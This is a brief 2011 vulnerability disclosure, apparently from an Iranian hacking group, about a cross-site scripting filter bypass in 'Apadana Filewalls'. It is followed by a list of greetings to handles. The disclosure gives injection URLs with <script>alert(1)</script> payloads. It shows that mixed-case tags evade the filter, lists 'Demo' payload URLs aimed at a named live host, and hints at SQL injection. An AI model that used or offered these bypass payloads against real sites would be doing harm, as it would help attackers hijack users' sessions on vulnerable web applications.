Apadana Filewalls Cross Site Scripting
Posted on 22 February 2011
$ Title: Apadana Filewalls Multiple Vulnerabilities $ Version: All Version $ AjaxTm.CoM http://apadana.ashiyane.ir/ =-=-=-=-=-=-=-=-=-=-=-=-(Vulnerability Details)-=-=-=-=-=-=-=-=-=-=-=-= $ Sample: http://www.server.com/index.php?pid=XSS http://www.server.com/index.php?pid=<script>alert(1);</script> [Error and detected] http://www.server.com/index.php?pid=<ScRiPt>alert(1);</ScRiPt> [Successfull bypass] and more for SQLi and .. $ Demo: http://ashiyanehost.com/domain.php?domain=test<script>alert(1);</sCrIpT> http://ashiyanehost.com/domain.php?domain=test<script>alert(1);</script> =-=-=-=-=-=-=-=-=-=-=-=-=-=(Thanks)=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= HUrr!c4nE - Cair3x - black.shadowes - hadihadi - iM4n - Mormoroth - irsdl Mr.Hesy - 4m!n - Dj7xpl - Sc0rpion - Expl0its - The-0utl4w - Mikili Net.Edit0r - md.r00t - S3Ri0uS - NeFrin - Skitt3r AjaxTm.com